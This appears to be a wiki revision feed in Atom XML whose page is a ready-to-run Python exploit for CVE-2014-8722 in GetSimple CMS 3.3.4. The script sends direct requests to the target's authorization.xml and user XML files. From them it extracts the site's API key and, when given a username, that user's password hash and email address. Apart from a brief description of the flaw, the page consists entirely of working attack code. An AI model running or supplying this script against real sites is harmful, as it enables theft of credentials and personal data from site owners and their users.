<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2014-8722_GetSimple_CMS_3.3.4_%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E</id>
	<title>CVE-2014-8722 GetSimple CMS 3.3.4 信息泄露漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=CVE-2014-8722_GetSimple_CMS_3.3.4_%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2014-8722_GetSimple_CMS_3.3.4_%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-24T13:24:33Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2014-8722_GetSimple_CMS_3.3.4_%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E&amp;diff=3892&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==EXP== &lt;pre&gt; # Exploit Title: GetSimple CMS 3.3.4 - Information Disclosure # Date 01.06.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: http://get-simple.in...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2014-8722_GetSimple_CMS_3.3.4_%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2%E6%BC%8F%E6%B4%9E&amp;diff=3892&amp;oldid=prev"/>
		<updated>2021-06-03T00:54:39Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==EXP== &amp;lt;pre&amp;gt; # Exploit Title: GetSimple CMS 3.3.4 - Information Disclosure # Date 01.06.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: http://get-simple.in...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==EXP==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Exploit Title: GetSimple CMS 3.3.4 - Information Disclosure&lt;br /&gt;
# Date 01.06.2021&lt;br /&gt;
# Exploit Author: Ron Jost (Hacker5preme)&lt;br /&gt;
# Vendor Homepage: http://get-simple.info/&lt;br /&gt;
# Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS/archive/refs/tags/v3.3.4.zip&lt;br /&gt;
# Version: 3.3.4&lt;br /&gt;
# CVE: CVE-2014-8722&lt;br /&gt;
# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2014-8722-Exploit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''&lt;br /&gt;
Description:&lt;br /&gt;
GetSimple CMS 3.3.4 allows remote attackers to obtain sensitive information via a direct request to&lt;br /&gt;
(1) data/users/&amp;lt;username&amp;gt;.xml,&lt;br /&gt;
(2) backups/users/&amp;lt;username&amp;gt;.xml.bak,&lt;br /&gt;
(3) data/other/authorization.xml, or&lt;br /&gt;
(4) data/other/appid.xml.&lt;br /&gt;
'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''&lt;br /&gt;
Import required modules:&lt;br /&gt;
'''&lt;br /&gt;
import sys&lt;br /&gt;
import requests&lt;br /&gt;
&lt;br /&gt;
'''&lt;br /&gt;
User-Input:&lt;br /&gt;
'''&lt;br /&gt;
target_ip = sys.argv[1]&lt;br /&gt;
target_port = sys.argv[2]&lt;br /&gt;
cmspath = sys.argv[3]&lt;br /&gt;
print('')&lt;br /&gt;
username = input(&amp;quot;Do you know the username? Y/N: &amp;quot;)&lt;br /&gt;
if username == 'Y':&lt;br /&gt;
    print('')&lt;br /&gt;
    username = True&lt;br /&gt;
    username_string = input('Please enter the username: ')&lt;br /&gt;
else:&lt;br /&gt;
    print('')&lt;br /&gt;
    username = False&lt;br /&gt;
    print('No problem, you will still get the API key')&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''&lt;br /&gt;
Get Api-Key:&lt;br /&gt;
'''&lt;br /&gt;
url = 'http://' + target_ip + ':' + target_port + cmspath + '/data/other/authorization.xml'&lt;br /&gt;
header = {&lt;br /&gt;
        &amp;quot;User-Agent&amp;quot;: &amp;quot;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0&amp;quot;,&lt;br /&gt;
        &amp;quot;Accept&amp;quot;: &amp;quot;text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8&amp;quot;,&lt;br /&gt;
        &amp;quot;Accept-Language&amp;quot;: &amp;quot;de,en-US;q=0.7,en;q=0.3&amp;quot;,&lt;br /&gt;
        &amp;quot;Accept-Encoding&amp;quot;: &amp;quot;gzip, deflate&amp;quot;,&lt;br /&gt;
        &amp;quot;Connection&amp;quot;: &amp;quot;close&amp;quot;,&lt;br /&gt;
        &amp;quot;Upgrade-Insecure-Requests&amp;quot;: &amp;quot;1&amp;quot;,&lt;br /&gt;
        &amp;quot;Cache-Control&amp;quot;: &amp;quot;max-age=0&amp;quot;&lt;br /&gt;
}&lt;br /&gt;
x = requests.get(url, headers=header).text&lt;br /&gt;
start = x.find('[') + 7&lt;br /&gt;
end = x.find(']')&lt;br /&gt;
api_key = x[start:end]&lt;br /&gt;
print('')&lt;br /&gt;
print('Informations:')&lt;br /&gt;
print('')&lt;br /&gt;
print('[*] API Key: ' + api_key)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
if username:&lt;br /&gt;
    '''&lt;br /&gt;
    Get Email and Passwordhash:&lt;br /&gt;
    '''&lt;br /&gt;
    url = &amp;quot;http://&amp;quot; + target_ip + ':' + target_port + cmspath + '/data/users/' + username_string + '.xml'&lt;br /&gt;
    header = {&lt;br /&gt;
            &amp;quot;User-Agent&amp;quot;: &amp;quot;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0&amp;quot;,&lt;br /&gt;
            &amp;quot;Accept&amp;quot;: &amp;quot;text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8&amp;quot;,&lt;br /&gt;
            &amp;quot;Accept-Language&amp;quot;: &amp;quot;de,en-US;q=0.7,en;q=0.3&amp;quot;,&lt;br /&gt;
            &amp;quot;Accept-Encoding&amp;quot;: &amp;quot;gzip, deflate&amp;quot;,&lt;br /&gt;
            &amp;quot;Connection&amp;quot;: &amp;quot;close&amp;quot;,&lt;br /&gt;
            &amp;quot;Upgrade-Insecure-Requests&amp;quot;: &amp;quot;1&amp;quot;,&lt;br /&gt;
            &amp;quot;Cache-Control&amp;quot;: &amp;quot;max-age=0&amp;quot;&lt;br /&gt;
    }&lt;br /&gt;
    x = requests.get(url, headers=header).text&lt;br /&gt;
    start =  x[x.find('PWD&amp;gt;'):]&lt;br /&gt;
    passwordhash = start[start.find('&amp;gt;') +1 :start.find('&amp;lt;')]&lt;br /&gt;
    print('[*] Hashed Password: ' + passwordhash)&lt;br /&gt;
&lt;br /&gt;
    start = x[x.find('EMAIL&amp;gt;'):]&lt;br /&gt;
    email = start[start.find('&amp;gt;') + 1 : start.find('&amp;lt;')]&lt;br /&gt;
    print('[*] Email: ' + email)&lt;br /&gt;
print('')&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>